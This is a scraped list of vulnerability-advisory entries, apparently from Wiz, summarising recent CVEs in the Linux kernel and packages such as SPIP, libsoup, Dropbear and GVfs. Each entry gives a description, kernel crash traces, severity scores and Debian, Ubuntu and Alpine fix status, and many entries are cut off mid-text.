Replace the recursive __aa_profile_list_release() approach with an
iterative approach in __remove_profile(). The function repeatedly
finds and removes leaf profiles until the entire subtree is removed,
maintaining the same removal semantic without recursion.
Source : NVD
Published April 1, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Explo
CVE-2023-54192 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
## CVE-2023-54192 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
f2fs: fix null pointer panic in tracepoint in __replace_atomic_write_block
We got a kernel panic if old_addr is NULL.
https://bugzilla.kernel.org/show_bug.cgi?id=217266
BUG: kernel NULL pointer dereference, address: 0000000000000000
Call Trace: f2fs_commit_atomic_write+0x619/0x990 [f2fs a1b985b80f5babd6f3ea778384908880812bfa43]
__f2fs_ioctl+0xd8e/0x4080 [f2fs a1b985b80f5babd6f3ea778384908880812bfa43]
? vfs_write+0x2ae/0x3f0
? vfs_write+0x2ae/0x3f0
__x64_sys_ioctl+0x91/0xd0
do_syscall_64+0x5c/0x90
entry_SYSCALL_64_after_hwframe+0x72/0xdc
RIP: 0033:0x7f69095fe53f
Source : NVD
Published December 30, 2025
CNA Score N/A
Affected Technologies
Linux
CVE-2026-2597 [HIGH] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
## CVE-2026-2597 :
Linux Debian vulnerability analysis and mitigation
Crypt::SysRandom::XS versions before 0.010 for Perl are vulnerable to a heap buffer overflow in the XS function random_bytes().
The function does not validate that the length parameter is non-negative. If a negative value (e.g. -1) is supplied, the expression length + 1u causes an integer wraparound, resulting in a zero-byte allocation. The subsequent call to the chosen random function (e.g. getrandom) passes the original negative value, which is implicitly converted to a large unsigned value (typically SIZE_MAX). This can result in writes beyond the allocated buffer, leading to heap memory corruption and application crash (denial of service).
In common usage, the length argument is typically hardcoded by the caller, whic
CVE-2026-1765 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
## CVE-2026-1765 :
Linux Debian vulnerability analysis and mitigation
[Heap Buffer Overflow in GNOME localsearch MP3 Extractor (TXXX Tags)]
Source : NVD
Published February 3, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) N/A
Exploitation Probability (EPSS) N/A
Affected packages and libraries
localsearch-debuginfo
localsearch-debugsource
Sources
NVD
Debian 11, 12, 13 Severity MEDIUM No Fix Added at: Feb 04, 2026
Debian 14 Has Fix Added at: Feb 04, 2026
Echo No Fix Added at: Feb 04, 2026
Red Hat 8, 9, 10 Severity MEDIUM No Fix Added at: Feb 04, 2026
Ubuntu 18.04, 20.04 Severity MEDIUM No Fix Added at: Feb 20, 202
CVE-2025-66004 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.1
## CVE-2025-66004 :
Linux Debian vulnerability analysis and mitigation
A Path Traversal vulnerability in usbmuxd allows local users to escalate to the service user. This issue affects usbmuxd: before 3ded00c9985a5108cfc7591a309f9a23d57a8cba.
Source : NVD
Score 5.1
Published December 10, 2025
Severity MEDIUM
CNA Score 5.1
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 9.5
Exploitation Probability (EPSS) N/A
Affected packages and libraries
usbmuxd
usbmuxd-debuginfo
Sources
NVD
Debian 11, 12, 13, 14 Severity MEDIUM Has Fix Added at: Dec 11, 2025
Echo Severity MEDIUM Has Fix Added at: Dec 11, 2025
Red Hat 6, 7, 8 Severity MEDIUM
CVE-2026-23342 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
## CVE-2026-23342 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
bpf: Fix race in cpumap on PREEMPT_RT
On PREEMPT_RT kernels, the per-CPU xdp_bulk_queue (bq) can be accessed
concurrently by multiple preemptible tasks on the same CPU.
The original code assumes bq_enqueue() and __cpu_map_flush() run
atomically with respect to each other on the same CPU, relying on
local_bh_disable() to prevent preemption. However, on PREEMPT_RT,
local_bh_disable() only calls migrate_disable() (when
PREEMPT_RT_NEEDS_BH_LOCK is not set) and does not disable
preemption, which allows CFS scheduling to preempt a task during
bq_flush_to_queue(), enabling another task on the same CPU to enter
bq_enqueue() and operate on the same per-CPU
CVE-2022-50729 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
## CVE-2022-50729 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
ksmbd: Fix resource leak in ksmbd_session_rpc_open()
When ksmbd_rpc_open() fails then it must call ksmbd_rpc_id_free() to
undo the result of ksmbd_ipc_id_alloc().
Source : NVD
Published December 24, 2025
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 7.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux-aws-fips
linux-azure-fips
Sources
NVD
Debian 12, 13, 14 Has Fix Added at: Dec 26, 2025
Echo Has Fix Added at: Dec 26, 2025
Ubuntu 16.04, 18.04 Severity MEDI
CVE-2025-68812 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
## CVE-2025-68812 :
Linux Debian vulnerability analysis and mitigation
Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.
Source : NVD
Published January 13, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) N/A
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux-hwe-6.17
linux-fips
Sources
NVD
Debian 14 Has Fix Added at: Jan 14, 2026
Ubuntu 16.04, 18.04, 20.04 Severity MEDIUM No Fix Added at: Jan 15, 2026
Ubuntu 24.04, 25.10 Severity MEDIUM No Fix Added at: Jan 18, 2026
CVE-2026-27474 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.8
## CVE-2026-27474 :
Linux Debian vulnerability analysis and mitigation
SPIP before 4.4.9 allows Cross-Site Scripting (XSS) in the private area, complementing an incomplete fix from SPIP 4.4.8. The echappe_anti_xss() function was not systematically applied to input, form, button, and anchor (a) HTML tags, allowing an attacker to inject malicious scripts through these elements. This vulnerability is not mitigated by the SPIP security screen.
Source : NVD
Score 4.8
Published February 19, 2026
Severity MEDIUM
CNA Score 4.8
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 16.2
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
s
CVE-2025-6595 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
## CVE-2025-6595 :
Linux Debian vulnerability analysis and mitigation
Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Wikimedia Foundation MultimediaViewer. This issue affects MultimediaViewer: from * before 1.39.13, 1.42.7, 1.43.2, 1.44.0.
Source : NVD
Published February 2, 2026
Severity NONE
CNA Score N/A
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
mediawiki
Sources
NVD
Debian 11, 12, 13 Severity MEDIUM Has Fix Added at: Jul 03, 2025
Debian 14 Severity MEDIUM Has Fix Added at: Aug 10, 2025
Echo Severity ME
CVE-2025-59030 [HIGH] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
## CVE-2025-59030 :
Linux Debian vulnerability analysis and mitigation
An attacker can trigger the removal of cached records by sending a NOTIFY query over TCP.
Source : NVD
Score 7.5
Published December 9, 2025
Severity HIGH
CNA Score 7.5
Affected Technologies
Linux Debian
Linux Alpine
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 24.6
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
pdns-recursor
Sources
NVD
Alpine 3.22, 3.23 Severity HIGH Has Fix Added at: Dec 14, 2025
Alpine edge Severity HIGH Has Fix Added at: Dec 09, 2025
Debian 11, 12 Severity HIGH No Fix Added at: Dec 09, 2025
Debian 13, 14 Severity HIGH Has Fix Added at: Dec 09, 2025
Echo Seve
CVE-2025-14934 [HIGH] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.8
## CVE-2025-14934 :
Linux Debian vulnerability analysis and mitigation
NSF Unidata NetCDF-C Variable Name Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of NSF Unidata NetCDF-C. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.
The specific flaw exists within the parsing of variable names. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-27267.
Source : NVD
Score 7.8
Published Decembe
CVE-2026-23406 [HIGH] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.8
## CVE-2026-23406 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
apparmor: fix side-effect bug in match_char() macro usage
The match_char() macro evaluates its character parameter multiple
times when traversing differential encoding chains. When invoked
with *str++, the string pointer advances on each iteration of the
inner do-while loop, causing the DFA to check different characters
at each iteration and therefore skip input characters.
This results in out-of-bounds reads when the pointer advances past
the input buffer boundary.
[ 94.984676] ==================================================================
[ 94.985301] BUG: KASAN: slab-out-of-bounds in aa_dfa_match+0x5ae/0x760
[ 94.985655] Read of size 1 at ad
CVE-2026-2574 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
## CVE-2026-2574 :
Linux Debian vulnerability analysis and mitigation
OOB Read in OpenSSL backend
Source : NVD
Published February 18, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) N/A
Exploitation Probability (EPSS) N/A
Affected packages and libraries
glib-networking
Sources
NVD
Debian 11, 12, 13, 14 Severity LOW No Fix Added at: Feb 18, 2026
Echo No Fix Added at: Feb 18, 2026
CVE-2025-71115 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.5
## CVE-2025-71115 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
um: init cpu_tasks[] earlier
This is currently done in uml_finishsetup(), but e.g. with
KCOV enabled we'll crash because some init code can call
into e.g. memparse(), which has coverage annotations, and
then the checks in check_kcov_mode() crash because current
is NULL.
Simply initialize the cpu_tasks[] array statically, which
fixes the crash. For the later SMP work, it seems to have
not really caused any problems yet, but initialize all of
the entries anyway.
Source : NVD
Score 5.5
Published January 14, 2026
Severity MEDIUM
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CVE-2026-23077 [HIGH] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.8
## CVE-2026-23077 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
mm/vma: fix anon_vma UAF on mremap() faulted, unfaulted merge
Patch series "mm/vma: fix anon_vma UAF on mremap() faulted, unfaulted
merge", v2.
Commit 879bca0a2c4f ("mm/vma: fix incorrectly disallowed anonymous VMA
merges") introduced the ability to merge previously unavailable VMA merge
scenarios.
However, it is handling merges incorrectly when it comes to mremap() of a
faulted VMA adjacent to an unfaulted VMA. The issues arise in three
cases:
Previous VMA unfaulted:
copied -----|
v
|-----------|.............|
| unfaulted |(faulted VMA)|
|-----------|.............|
prev
Next VMA unfaulted:
copied -----|
v
|.............|-----------|
|(faulted
CVE-2026-33549 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.7
## CVE-2026-33549 :
Linux Debian vulnerability analysis and mitigation
SPIP 4.4.10 through 4.4.12 before 4.4.13 allows unintended privilege assignment (of administrator privileges) during the editing of an author data structure because of STATUT mishandling.
Source : NVD
Score 6.7
Published March 22, 2026
Severity MEDIUM
CNA Score 6.7
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 11.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
spip
Sources
NVD
Debian 11 Severity MEDIUM No Fix Added at: Mar 22, 2026
Debian 13, 14 Severity MEDIUM Has Fix Added at: Mar 22, 2026
Echo Severity MEDIUM Has Fix Added at: Mar 22, 202
CVE-2025-69412 [LOW] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 3.4
## CVE-2025-69412 :
Linux Debian vulnerability analysis and mitigation
KDE messagelib before 25.11.90 ignores SSL errors for threatMatches:find in the Google Safe Browsing Lookup API (aka phishing API), which might allow spoofing of threat data. NOTE: this Lookup API is not contacted in the messagelib default configuration.
Source : NVD
Score 3.4
Published January 1, 2026
Severity LOW
CNA Score 3.4
Affected Technologies
Linux Debian
Linux Alpine
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
kf5-messagelib
messagelib
Sources
NVD
Alpine 3.23 Severity LOW Has Fix Added at: Jan 11, 2026
Debian 11, 12, 13
CVE-2025-32735 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.8
## CVE-2025-32735 :
Linux Debian vulnerability analysis and mitigation
Improper conditions check in some firmware for some Intel(R) NPU Drivers within Ring 1: Device Drivers may allow a denial of service. Unprivileged software adversary with an authenticated user combined with a low complexity attack may enable denial of service. This result may potentially occur via local access when attack requirements are not present without special internal knowledge and requires no user interaction. The potential vulnerability may impact the confidentiality (none), integrity (none) and availability (high) of the vulnerable system, resulting in subsequent system confidentiality (none), integrity (none) and availability (none) impacts.
Source : NVD
Score 6.8
Published February 10, 2026
Sever
CVE-2026-30405 [HIGH] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
## CVE-2026-30405 :
Linux Debian vulnerability analysis and mitigation
An issue in GoBGP gobgpd v.4.2.0 allows a remote attacker to cause a denial of service via the NEXT_HOP path attribute.
Source : NVD
Score 7.5
Published March 16, 2026
Severity HIGH
CNA Score 7.5
Affected Technologies
Linux Debian
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 34.6
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
github.com/osrg/gobgp/v4
gobgp
Sources
NVD
Debian 11 Severity MEDIUM No Fix Added at: Mar 17, 2026
Debian 12, 13 Severity HIGH No Fix Added at: Mar 17, 2026
Debian 14 Severity HIGH Has Fix Added at: Mar 17, 2026
Echo Severity HIGH No Fix Added at: Mar
CVE-2025-68240 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.9
## CVE-2025-68240 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
nilfs2: avoid having an active sc_timer before freeing sci
Because kthread_stop did not stop sc_task properly and returned -EINTR,
the sc_timer was not properly closed, ultimately causing the problem [1]
reported by syzbot when freeing sci due to the sc_timer not being closed.
Because the thread sc_task main function nilfs_segctor_thread() returns 0
when it succeeds, when the return value of kthread_stop() is not 0 in
nilfs_segctor_destroy(), we believe that it has not properly closed
sc_timer.
We use timer_shutdown_sync() to sync wait for sc_timer to shutdown, and
set the value of sc_task to NULL under the protection of lock
sc_state_lock, so as
CVE-2026-1539 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.8
## CVE-2026-1539 :
Linux Debian vulnerability analysis and mitigation
A flaw was found in the libsoup HTTP library that can cause proxy authentication credentials to be sent to unintended destinations. When handling HTTP redirects, libsoup removes the Authorization header but does not remove the Proxy-Authorization header if the request is redirected to a different host. As a result, sensitive proxy credentials may be leaked to third-party servers. Applications using libsoup for HTTP communication may unintentionally expose proxy authentication data.
Source : NVD
Score 5.8
Published January 28, 2026
Severity MEDIUM
CNA Score 5.8
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
CVE-2026-23405 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
## CVE-2026-23405 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
apparmor: fix: limit the number of levels of policy namespaces
Currently the number of policy namespaces is not bounded relying on
the user namespace limit. However policy namespaces aren't strictly
tied to user namespaces and it is possible to create them and nest
them arbitrarily deep which can be used to exhaust system resource.
Hard cap policy namespaces to the same depth as user namespaces.
Source : NVD
Published April 1, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6.3
Explo
CVE-2026-23400 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
## CVE-2026-23400 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
rust_binder: call set_notification_done() without proc lock
Consider the following sequence of events on a death listener:
The remote process dies and sends a BR_DEAD_BINDER message.
The local process invokes the BC_CLEAR_DEATH_NOTIFICATION command.
The local process then invokes the BC_DEAD_BINDER_DONE. Then, the kernel will reply to the BC_DEAD_BINDER_DONE command with a BR_CLEAR_DEATH_NOTIFICATION_DONE reply using push_work_if_looper().
However, this can result in a deadlock if the current thread is not a
looper. This is because dead_binder_done() still holds the proc lock
during set_notification_done(), which called push_work_if_looper().
Norm
CVE-2026-23283 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
## CVE-2026-23283 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
regulator: fp9931: Fix PM runtime reference leak in fp9931_hwmon_read()
In fp9931_hwmon_read(), if regmap_read() failed, the function returned
the error code without calling pm_runtime_put_autosuspend(), causing
a PM reference leak.
Source : NVD
Published March 25, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6.5
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux
Sources
NVD
Debian 14 Has Fix Added at: Mar 26, 2026
CVE-2026-2889 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.8
## CVE-2026-2889 :
Linux Debian vulnerability analysis and mitigation
A vulnerability was detected in CCExtractor up to 0.96.5. Affected is the function processmp4 in the library src/lib_ccx/mp4.c. Performing a manipulation results in use after free. The attack is only possible with local access. The exploit is now public and may be used. Upgrading to version 0.96.6 is able to address this issue. The patch is named fd7271bae238ccb3ae8a71304ea64f0886324925. You should upgrade the affected component.
Source : NVD
Score 4.8
Published February 21, 2026
Severity MEDIUM
CNA Score 4.8
Affected Technologies
Linux Debian
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 3.5
Exploitation Prob
CVE-2022-50713 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
## CVE-2022-50713 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
clk: visconti: Fix memory leak in visconti_register_pll()
@pll->rate_table has memory allocated by kmemdup(); if clk_hw_register()
fails, it should be freed, otherwise it will cause a memory leak.
This patch fixes it.
Source : NVD
Published December 24, 2025
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6.8
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux
linux-aws-fips
Sources
NVD
Debian 12, 13, 14 Has Fix Added at: Dec 26, 2025
Echo Has Fix Added at:
CVE-2025-67749 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
## CVE-2025-67749 :
Linux Debian vulnerability analysis and mitigation
PCSX2 is a free and open-source PlayStation 2 (PS2) emulator. In versions 2.5.377 and below, an unchecked offset and size used in a memcpy operation inside PCSX2's CDVD SCMD 0x91 and SCMD 0x8F handlers allow a specially crafted disc image or ELF to cause an out-of-bounds read from emulator memory. Because the offset and size is controlled through MG header fields, a specially crafted ELF can read data beyond the bounds of mg_buffer and have it reflected back into emulated memory. This issue is fixed in version 2.5.378.
Source : NVD
Score 5.3
Published December 12, 2025
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release D
CVE-2026-23027 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
## CVE-2026-23027 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
LoongArch: KVM: Fix kvm_device leak in kvm_pch_pic_destroy()
In kvm_ioctl_create_device(), kvm_device has allocated memory;
kvm_device->destroy() seems to be supposed to free its kvm_device
struct, but kvm_pch_pic_destroy() is not currently doing this, which
would lead to a memory leak.
So, fix it.
Source : NVD
Published January 31, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux-gcp-6.8
linux-gkeop
Sour
CVE-2025-68220 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
## CVE-2025-68220 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
net: ethernet: ti: netcp: Standardize knav_dma_open_channel to return NULL on error
Make knav_dma_open_channel consistently return NULL on error instead
of ERR_PTR. Currently the header include/linux/soc/ti/knav_dma.h
returns NULL when the driver is disabled, but the driver
implementation does not even return NULL or ERR_PTR on failure,
causing inconsistency in the users. This results in a crash in
netcp_free_navigator_resources as follows (trimmed):
Unhandled fault: alignment exception (0x221) at 0xfffffff2
[fffffff2] *pgd=80000800207003, *pmd=82ffda003, *pte=00000000
Internal error: : 221 [#1] SMP ARM
Modules linked in:
CPU: 0 UID: 0 PID: 1 Comm
CVE-2026-23427 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
## CVE-2026-23427 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
ksmbd: fix use-after-free in durable v2 replay of active file handles
parse_durable_handle_context() unconditionally assigns dh_info->fp->conn
to the current connection when handling a DURABLE_REQ_V2 context with
SMB2_FLAGS_REPLAY_OPERATION. ksmbd_lookup_fd_cguid() does not filter by
fp->conn, so it returns file handles that are already actively connected.
The unconditional overwrite replaces fp->conn, and when the overwriting
connection is subsequently freed, __ksmbd_close_fd() dereferences the
stale fp->conn via spin_lock(&fp->conn->llist_lock), causing a
use-after-free.
KASAN report:
[ 7.349357] =================================================
CVE-2026-32953 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.7
## CVE-2026-32953 :
Linux Debian vulnerability analysis and mitigation
Tillitis TKey Client package is a Go package for a TKey client. Versions 1.2.0 and below contain a critical bug in the tkeyclient Go module which causes 1 out of every 256 User Supplied Secrets (USS) to be silently ignored, producing the same Compound Device Identifier (CDI)—and thus the same key material—as if no USS is provided. This happens because a buffer index error overwrites the USS-enabled boolean with the first byte of the USS digest, so any USS whose hash starts with 0x00 is effectively discarded. This issue has been fixed in version 1.3.0. Users unable to upgrade immediately should switch to a USS whose hash does not begin with a zero byte.
Source : NVD
Score 4.7
Published March 20, 2026
Severity
CVE-2026-23295 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
## CVE-2026-23295 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
accel/amdxdna: Fix dead lock for suspend and resume
When an application issues a query IOCTL while auto suspend is running,
a deadlock can occur. The query path holds dev_lock and then calls
pm_runtime_resume_and_get(), which waits for the ongoing suspend to
complete. Meanwhile, the suspend callback attempts to acquire dev_lock
and blocks, resulting in a deadlock.
Fix this by releasing dev_lock before calling pm_runtime_resume_and_get()
and reacquiring it after the call completes. Also acquire dev_lock in the
resume callback to keep the locking consistent.
Source : NVD
Published March 25, 2026
CNA Score N/A
Affected Technologies
Linux Debian
CVE-2026-31410 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
## CVE-2026-31410: Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
ksmbd: use volume UUID in FS_OBJECT_ID_INFORMATION
Use sb->s_uuid for a proper volume identifier as the primary choice.
For filesystems that do not provide a UUID, fall back to stfs.f_fsid
obtained from vfs_statfs().
Source : NVD
Score 6.5
Published April 6, 2026
Severity MEDIUM
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux-aws-fips
linux-azure-fips
Sources
NVD
Debian 11, 12, 13 No Fix Added at: A
blogs_wiz·CVSS 4.3
CVE-2026-28296 [MEDIUM] CVE-2026-28296 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-28296: Linux Debian vulnerability analysis and mitigation
A flaw was found in the FTP GVfs backend. A remote attacker could exploit this input validation vulnerability by supplying specially crafted file paths containing carriage return and line feed (CRLF) sequences. These unsanitized sequences allow the attacker to terminate intended FTP commands and inject arbitrary FTP commands, potentially leading to arbitrary code execution or other severe impacts.
Source : NVD
Score 4.3
Published February 26, 2026
Severity MEDIUM
CNA Score 4.3
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 20.2
Exploitation Probability (EPSS) 0.1
blogs_wiz·CVSS 8.4
CVE-2020-37040 [HIGH] CVE-2020-37040 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2020-37040: Echo vulnerability analysis and mitigation
Code Blocks 17.12 contains a local buffer overflow vulnerability that allows attackers to execute arbitrary code by crafting a malicious file name with Unicode characters. Attackers can trigger the vulnerability by pasting a specially crafted payload into the file name field during project creation, potentially executing system commands like calc.exe.
Source : NVD
Score 8.4
Published January 30, 2026
Severity HIGH
CNA Score 8.4
Affected Technologies
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.5
Exploitation Probability (EPSS) N/A
Affected packages and libraries
codeblocks
Sources
NVD
Echo Severity HIGH
blogs_wiz·CVSS 5.3
CVE-2025-40358 [MEDIUM] CVE-2025-40358 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-40358: Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
riscv: stacktrace: Disable KASAN checks for non-current tasks
Unwinding the stack of a task other than current, KASAN would report
"BUG: KASAN: out-of-bounds in walk_stackframe+0x41c/0x460"
There is the same issue on x86, and it has been resolved by the commit
84936118bdf3 ("x86/unwind: Disable KASAN checks for non-current tasks").
The solution could be applied to RISC-V too.
This patch also can solve the issue: https://seclists.org/oss-sec/2025/q4/23
[[email protected]: clean up checkpatch issues]
Source : NVD
Published December 16, 2025
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
blogs_wiz·CVSS 5.4
CVE-2025-14282 [MEDIUM] CVE-2025-14282 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-14282: Linux Debian vulnerability analysis and mitigation
A flaw was found in Dropbear. When running in multi-user mode and authenticating users, the dropbear ssh server does the socket forwardings requested by the remote client as root, only switching to the logged-in user upon spawning a shell or performing some operations like reading the user's files.
With the recent ability of also using unix domain sockets as the forwarding destination, any user able to log in via ssh can connect to any unix socket with the root's credentials, bypassing both file system restrictions and any SO_PEERCRED / SO_PASSCRED checks performed by the peer.
Source : NVD
Score 5.4
Published February 12, 2026
Severity MEDIUM
CNA Score 5.4
Affected Technologies
Linux Debian
Linux Alpine
blogs_wiz·CVSS 8.1
CVE-2026-32726 [HIGH] CVE-2026-32726 Impact, Exploitability, and Mitigation Steps | Wiz
